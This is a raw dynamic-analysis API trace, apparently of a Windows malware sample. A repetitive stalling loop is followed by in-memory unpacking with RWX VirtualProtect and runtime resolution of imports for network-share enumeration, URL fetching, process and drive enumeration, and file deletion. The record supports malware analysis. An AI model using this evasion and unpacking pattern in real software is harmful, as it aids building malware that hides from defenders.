[0201.133] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.133] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.133] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.133] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.133] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.133] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.133] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.133] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.133] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.133] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.133] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.133] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.133] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.133] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.133] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.133] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.133] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.134] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.134] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.134] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.134] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.134] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.134] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.134] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.134] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.134] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.134] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.134] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.134] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.134] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.134] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.134] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.134] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.134] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.134] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.134] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.134] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.134] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.134] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.134] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.134] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.134] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.134] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.134] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.134] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.134] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.134] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.134] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.134] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.134] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.134] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.134] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.134] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.134] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.134] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.135] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.135] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.135] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.135] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.135] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.135] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.135] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.135] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.135] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.135] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.135] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.135] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.135] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.135] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.135] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.135] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.135] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.135] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.135] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.135] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.135] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.135] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.135] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.135] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.135] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.135] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.135] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.135] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.135] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.135] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.135] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.135] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.135] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.136] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.136] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.136] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.136] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.136] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.136] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.136] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.136] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.136] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.136] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.136] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.136] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.136] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.136] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.136] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.136] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.136] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.136] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.136] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.136] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.136] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.136] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.136] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.136] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.136] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.136] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.136] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.136] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.136] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.136] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0209.043] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74ea0000 [0209.122] VirtualProtect (in: lpAddress=0x2e0020, dwSize=0x90c00, flNewProtect=0x40, lpflOldProtect=0x18e670 | out: lpflOldProtect=0x18e670*=0x4) returned 1 [0209.464] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74ea0000 [0209.465] GetProcAddress (hModule=0x74ea0000, lpProcName="GlobalAlloc") returned 0x74eb588e [0209.465] GetProcAddress (hModule=0x74ea0000, lpProcName="GetLastError") returned 0x74eb11c0 [0209.465] GetProcAddress (hModule=0x74ea0000, lpProcName="Sleep") returned 0x74eb10ff [0209.465] GetProcAddress (hModule=0x74ea0000, lpProcName="VirtualAlloc") returned 0x74eb1856 [0209.465] GetProcAddress (hModule=0x74ea0000, lpProcName="CreateToolhelp32Snapshot") returned 0x74ed735f [0209.465] GetProcAddress (hModule=0x74ea0000, lpProcName="Module32First") returned 0x74f35cd9 [0209.465] GetProcAddress (hModule=0x74ea0000, lpProcName="CloseHandle") returned 0x74eb1410 [0209.466] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0209.468] Module32First (hSnapshot=0x58, lpme=0x18e804) returned 1 [0209.471] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x1e50000 [0209.943] GetProcAddress (hModule=0x74ea0000, lpProcName="LoadLibraryA") returned 0x74eb49d7 [0209.943] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74ea0000 [0209.943] GetProcAddress (hModule=0x74ea0000, lpProcName="VirtualAlloc") returned 0x74eb1856 [0209.943] GetProcAddress (hModule=0x74ea0000, lpProcName="VirtualProtect") returned 0x74eb435f [0209.943] GetProcAddress (hModule=0x74ea0000, lpProcName="VirtualFree") returned 0x74eb186e [0209.943] GetProcAddress (hModule=0x74ea0000, lpProcName="GetVersionExA") returned 0x74eb3519 [0209.944] GetProcAddress (hModule=0x74ea0000, lpProcName="TerminateProcess") returned 0x74ecd802 [0209.944] GetProcAddress (hModule=0x74ea0000, lpProcName="ExitProcess") returned 0x74eb7a10 [0209.944] GetProcAddress (hModule=0x74ea0000, lpProcName="SetErrorMode") returned 0x74eb1b00 [0209.944] SetErrorMode (uMode=0x400) returned 0x0 [0209.944] SetErrorMode (uMode=0x0) returned 0x400 [0209.944] GetVersionExA (in: lpVersionInformation=0x18d734*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s},w") | out: lpVersionInformation=0x18d734*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0209.944] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0210.095] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18e7bc | out: lpflOldProtect=0x18e7bc*=0x2) returned 1 [0211.225] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0211.335] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x76820000 [0211.335] GetProcAddress (hModule=0x76820000, lpProcName="RpcStringFreeW") returned 0x76841635 [0211.335] GetProcAddress (hModule=0x76820000, lpProcName="UuidCreate") returned 0x7683f48b [0211.335] GetProcAddress (hModule=0x76820000, lpProcName="UuidToStringW") returned 0x76861ee5 [0211.335] GetProcAddress (hModule=0x76820000, lpProcName="RpcStringFreeA") returned 0x76863fc5 [0211.335] GetProcAddress (hModule=0x76820000, lpProcName="UuidToStringA") returned 0x7689d918 [0211.335] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x74c80000 [0212.463] GetProcAddress (hModule=0x74c80000, lpProcName="WNetOpenEnumW") returned 0x74c82f06 [0212.463] GetProcAddress (hModule=0x74c80000, lpProcName="WNetEnumResourceW") returned 0x74c83058 [0212.463] GetProcAddress (hModule=0x74c80000, lpProcName="WNetCloseEnum") returned 0x74c82dd6 [0212.463] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x76c10000 [0212.482] GetProcAddress (hModule=0x76c10000, lpProcName="InternetCloseHandle") returned 0x76c2ab49 [0212.482] GetProcAddress (hModule=0x76c10000, lpProcName="InternetReadFile") returned 0x76c2b406 [0212.482] GetProcAddress (hModule=0x76c10000, lpProcName="InternetOpenUrlW") returned 0x76c8be5c [0212.482] GetProcAddress (hModule=0x76c10000, lpProcName="InternetOpenW") returned 0x76c39197 [0212.482] GetProcAddress (hModule=0x76c10000, lpProcName="HttpQueryInfoW") returned 0x76c35c75 [0212.482] GetProcAddress (hModule=0x76c10000, lpProcName="InternetOpenA") returned 0x76c3f18e [0212.482] GetProcAddress (hModule=0x76c10000, lpProcName="InternetOpenUrlA") returned 0x76c530f1 [0212.482] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x74c40000 [0212.642] GetProcAddress (hModule=0x74c40000, lpProcName="timeGetTime") returned 0x74c426e0 [0212.642] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x75ef0000 [0212.643] GetProcAddress (hModule=0x75ef0000, lpProcName="PathAppendA") returned 0x75efd65e [0212.643] GetProcAddress (hModule=0x75ef0000, lpProcName="PathFindFileNameW") returned 0x75f0bb71 [0212.643] GetProcAddress (hModule=0x75ef0000, lpProcName="PathRemoveFileSpecW") returned 0x75f03248 [0212.643] GetProcAddress (hModule=0x75ef0000, lpProcName="PathFileExistsA") returned 0x75f2ad1a [0212.643] GetProcAddress (hModule=0x75ef0000, lpProcName="PathFileExistsW") returned 0x75f045bf [0212.643] GetProcAddress (hModule=0x75ef0000, lpProcName="PathAppendW") returned 0x75f081ef [0212.643] GetProcAddress (hModule=0x75ef0000, lpProcName="PathFindExtensionW") returned 0x75f0a1b9 [0212.643] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x74ea0000 [0212.643] GetProcAddress (hModule=0x74ea0000, lpProcName="VirtualFree") returned 0x74eb186e [0212.643] GetProcAddress (hModule=0x74ea0000, lpProcName="WriteFile") returned 0x74eb1282 [0212.644] GetProcAddress (hModule=0x74ea0000, lpProcName="GetDriveTypeA") returned 0x74ecef75 [0212.644] GetProcAddress (hModule=0x74ea0000, lpProcName="OpenProcess") returned 0x74eb1986 [0212.644] GetProcAddress (hModule=0x74ea0000, lpProcName="GlobalAlloc") returned 0x74eb588e [0212.644] GetProcAddress (hModule=0x74ea0000, lpProcName="GetSystemDirectoryW") returned 0x74eb5063 [0212.644] GetProcAddress (hModule=0x74ea0000, lpProcName="WideCharToMultiByte") returned 0x74eb170d [0212.644] GetProcAddress (hModule=0x74ea0000, lpProcName="LoadLibraryW") returned 0x74eb492b [0212.644] GetProcAddress (hModule=0x74ea0000, lpProcName="Sleep") returned 0x74eb10ff [0212.644] GetProcAddress (hModule=0x74ea0000, lpProcName="CopyFileW") returned 0x74ed830d [0212.644] GetProcAddress (hModule=0x74ea0000, lpProcName="FormatMessageW") returned 0x74eb4620 [0212.644] GetProcAddress (hModule=0x74ea0000, lpProcName="lstrcpynW") returned 0x74edd556 [0212.644] GetProcAddress (hModule=0x74ea0000, lpProcName="CreateProcessA") returned 0x74eb1072 [0212.645] GetProcAddress (hModule=0x74ea0000, lpProcName="TerminateProcess") returned 0x74ecd802 [0212.645] GetProcAddress (hModule=0x74ea0000, lpProcName="ReadFile") returned 0x74eb3ed3 [0212.645] GetProcAddress (hModule=0x74ea0000, lpProcName="CreateFileW") returned 0x74eb3f5c [0212.645] GetProcAddress (hModule=0x74ea0000, lpProcName="lstrcatA") returned 0x74ed2b7a [0212.645] GetProcAddress (hModule=0x74ea0000, lpProcName="GetEnvironmentVariableA") returned 0x74eb33a0 [0212.645] GetProcAddress (hModule=0x74ea0000, lpProcName="lstrcmpW") returned 0x74eb5929 [0212.645] GetProcAddress (hModule=0x74ea0000, lpProcName="MultiByteToWideChar") returned 0x74eb192e [0212.645] GetProcAddress (hModule=0x74ea0000, lpProcName="lstrlenW") returned 0x74eb1700 [0212.645] GetProcAddress (hModule=0x74ea0000, lpProcName="FlushFileBuffers") returned 0x74eb469b [0212.645] GetProcAddress (hModule=0x74ea0000, lpProcName="GetShortPathNameA") returned 0x74ed594d [0212.645] GetProcAddress (hModule=0x74ea0000, lpProcName="GetFileSizeEx") returned 0x74eb59e2 [0212.646] GetProcAddress (hModule=0x74ea0000, lpProcName="GetLastError") returned 0x74eb11c0 [0212.646] GetProcAddress (hModule=0x74ea0000, lpProcName="SetLastError") returned 0x74eb11a9 [0212.646] GetProcAddress (hModule=0x74ea0000, lpProcName="GetProcAddress") returned 0x74eb1222 [0212.646] GetProcAddress (hModule=0x74ea0000, lpProcName="VirtualAlloc") returned 0x74eb1856 [0212.646] GetProcAddress (hModule=0x74ea0000, lpProcName="MoveFileW") returned 0x74ec9af0 [0212.646] GetProcAddress (hModule=0x74ea0000, lpProcName="FindClose") returned 0x74eb4442 [0212.646] GetProcAddress (hModule=0x74ea0000, lpProcName="Process32FirstW") returned 0x74ed8baf [0212.646] GetProcAddress (hModule=0x74ea0000, lpProcName="LocalAlloc") returned 0x74eb168c [0212.646] GetProcAddress (hModule=0x74ea0000, lpProcName="CreateEventW") returned 0x74eb183e [0212.646] GetProcAddress (hModule=0x74ea0000, lpProcName="GetModuleFileNameA") returned 0x74eb14b1 [0212.647] GetProcAddress (hModule=0x74ea0000, lpProcName="Process32NextW") returned 0x74ed896c [0212.647] GetProcAddress (hModule=0x74ea0000, lpProcName="lstrcatW") returned 0x74ed828e [0212.647] GetProcAddress (hModule=0x74ea0000, lpProcName="CreateMutexA") returned 0x74eb4c6b [0212.647] GetProcAddress (hModule=0x74ea0000, lpProcName="FindNextFileW") returned 0x74eb54ee [0212.647] GetProcAddress (hModule=0x74ea0000, lpProcName="CreateToolhelp32Snapshot") returned 0x74ed735f [0212.647] GetProcAddress (hModule=0x74ea0000, lpProcName="SetEnvironmentVariableA") returned 0x74ebe331 [0212.647] GetProcAddress (hModule=0x74ea0000, lpProcName="DeleteFileW") returned 0x74eb89b3 [0212.647] GetProcAddress (hModule=0x74ea0000, lpProcName="LocalFree") returned 0x74eb2d3c [0212.647] GetProcAddress (hModule=0x74ea0000, lpProcName="lstrcpyW") returned 0x74ed3102 [0212.647] GetProcAddress (hModule=0x74ea0000, lpProcName="DeleteFileA") returned 0x74eb5444 [0212.647] GetProcAddress (hModule=0x74ea0000, lpProcName="lstrcpyA") returned 0x74ed2a9d [0212.647] GetProcAddress (hModule=0x74ea0000, lpProcName="SetPriorityClass") returned 0x74eccf28 [0212.648] GetProcAddress (hModule=0x74ea0000, lpProcName="GetCurrentProcess") returned 0x74eb1809 [0212.648] GetProcAddress (hModule=0x74ea0000, lpProcName="GetComputerNameW") returned 0x74ebdd0e [0212.648] GetProcAddress (hModule=0x74ea0000, lpProcName="GetLogicalDrives") returned 0x74eb5371 [0212.648] GetProcAddress (hModule=0x74ea0000, lpProcName="GetModuleFileNameW") returned 0x74eb4950 [0212.648] GetProcAddress (hModule=0x74ea0000, lpProcName="SetStdHandle") returned 0x74f3454f [0212.648] GetProcAddress (hModule=0x74ea0000, lpProcName="GetVersion") returned 0x74eb4467 [0212.648] GetProcAddress (hModule=0x74ea0000, lpProcName="CreateDirectoryA") returned 0x74edd526 [0212.648] GetProcAddress (hModule=0x74ea0000, lpProcName="CreateThread") returned 0x74eb34d5 [0212.648] GetProcAddress (hModule=0x74ea0000, lpProcName="CompareStringW") returned 0x74eb3bca [0212.648] GetProcAddress (hModule=0x74ea0000, lpProcName="GetTimeFormatW") returned 0x74ecf481 [0212.648] GetProcAddress (hModule=0x74ea0000, lpProcName="GetDateFormatW") returned 0x74ed34d7 [0212.648] GetProcAddress (hModule=0x74ea0000, lpProcName="EnumSystemLocalesW") returned 0x74f3425f [0212.648] GetProcAddress (hModule=0x74ea0000, lpProcName="GetUserDefaultLCID") returned 0x74eb3da5 [0212.649] GetProcAddress (hModule=0x74ea0000, lpProcName="IsValidLocale") returned 0x74ecce46 [0212.649] GetProcAddress (hModule=0x74ea0000, lpProcName="GetLocaleInfoW") returned 0x74eb3c42 [0212.649] GetProcAddress (hModule=0x74ea0000, lpProcName="CreateSemaphoreW") returned 0x74ecca5a [0212.649] GetProcAddress (hModule=0x74ea0000, lpProcName="GetModuleHandleW") returned 0x74eb34b0 [0212.649] GetProcAddress (hModule=0x74ea0000, lpProcName="GetTickCount") returned 0x74eb110c [0212.649] GetProcAddress (hModule=0x74ea0000, lpProcName="TlsFree") returned 0x74eb3587 [0212.649] GetProcAddress (hModule=0x74ea0000, lpProcName="TlsSetValue") returned 0x74eb14fb [0212.649] GetProcAddress (hModule=0x74ea0000, lpProcName="TlsGetValue") returned 0x74eb11e0 [0212.649] GetProcAddress (hModule=0x74ea0000, lpProcName="TlsAlloc") returned 0x74eb49ad [0212.649] GetProcAddress (hModule=0x74ea0000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x74eb1916 [0212.649] GetProcAddress (hModule=0x74ea0000, lpProcName="SetUnhandledExceptionFilter") returned 0x74eb87c9 [0212.649] GetProcAddress (hModule=0x74ea0000, lpProcName="UnhandledExceptionFilter") returned 0x74ed772f [0212.650] GetProcAddress (hModule=0x74ea0000, lpProcName="GetModuleHandleA") returned 0x74eb1245 [0212.650] GetProcAddress (hModule=0x74ea0000, lpProcName="GetVersionExA") returned 0x74eb3519 [0212.650] GetProcAddress (hModule=0x74ea0000, lpProcName="GlobalMemoryStatus") returned 0x74eb8b6d [0212.650] GetProcAddress (hModule=0x74ea0000, lpProcName="LoadLibraryA") returned 0x74eb49d7 [0212.650] GetProcAddress (hModule=0x74ea0000, lpProcName="FlushConsoleInputBuffer") returned 0x74f57a9f [0212.650] GetProcAddress (hModule=0x74ea0000, lpProcName="WaitForSingleObject") returned 0x74eb1136 [0212.650] GetProcAddress (hModule=0x74ea0000, lpProcName="CreateDirectoryW") returned 0x74eb4259 [0212.650] GetProcAddress (hModule=0x74ea0000, lpProcName="SetFilePointerEx") returned 0x74ecc807 [0212.650] GetProcAddress (hModule=0x74ea0000, lpProcName="CreateProcessW") returned 0x74eb103d [0212.650] GetProcAddress (hModule=0x74ea0000, lpProcName="FreeLibrary") returned 0x74eb34c8 [0212.650] GetProcAddress (hModule=0x74ea0000, lpProcName="SetErrorMode") returned 0x74eb1b00 [0212.650] GetProcAddress (hModule=0x74ea0000, lpProcName="lstrlenA") returned 0x74eb5a4b [0212.651] GetProcAddress (hModule=0x74ea0000, lpProcName="SetFilePointer") returned 0x74eb17d1 [0212.651] GetProcAddress (hModule=0x74ea0000, lpProcName="FindFirstFileW") returned 0x74eb4435 [0212.651] GetProcAddress (hModule=0x74ea0000, lpProcName="SetConsoleMode") returned 0x74eca77d [0212.651] GetProcAddress (hModule=0x74ea0000, lpProcName="CreateFileA") returned 0x74eb53c6 [0212.651] GetProcAddress (hModule=0x74ea0000, lpProcName="GetCommandLineW") returned 0x74eb5223 [0212.651] GetProcAddress (hModule=0x74ea0000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x74f5793f [0212.651] GetProcAddress (hModule=0x74ea0000, lpProcName="PeekConsoleInputA") returned 0x74f56f0d [0212.651] GetProcAddress (hModule=0x74ea0000, lpProcName="FreeEnvironmentStringsW") returned 0x74eb51cb [0212.651] GetProcAddress (hModule=0x74ea0000, lpProcName="GetEnvironmentStringsW") returned 0x74eb51e3 [0212.651] GetProcAddress (hModule=0x74ea0000, lpProcName="GetCurrentProcessId") returned 0x74eb11f8 [0212.651] GetProcAddress (hModule=0x74ea0000, lpProcName="QueryPerformanceCounter") returned 0x74eb1725 [0212.652] GetProcAddress (hModule=0x74ea0000, lpProcName="GetTimeZoneInformation") returned 0x74eb465a [0212.652] GetProcAddress (hModule=0x74ea0000, lpProcName="RaiseException") returned 0x74eb58a6 [0212.652] GetProcAddress (hModule=0x74ea0000, lpProcName="GetStringTypeW") returned 0x74eb1946 [0212.652] GetProcAddress (hModule=0x74ea0000, lpProcName="GetConsoleCP") returned 0x74f57bff [0212.652] GetProcAddress (hModule=0x74ea0000, lpProcName="ReadConsoleW") returned 0x74f5739a [0212.652] GetProcAddress (hModule=0x74ea0000, 